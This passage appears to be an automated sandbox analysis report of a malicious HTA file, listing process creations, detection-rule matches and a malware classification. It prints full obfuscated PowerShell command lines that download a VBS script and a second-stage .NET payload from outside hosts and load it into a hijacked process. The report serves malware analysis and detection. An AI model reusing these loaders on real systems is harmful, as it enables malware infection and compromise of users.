        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7864, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2466
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2466Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7864, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.phis.expl.evad.winHTA@17/17@1/2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemebestthingswithentirethingswithgreatnaturethings[1].tiffJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1myk0zmr.0t2.ps1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: seemebestthings.htaReversingLabs: Detection: 21%
        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seemebestthings.hta"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgI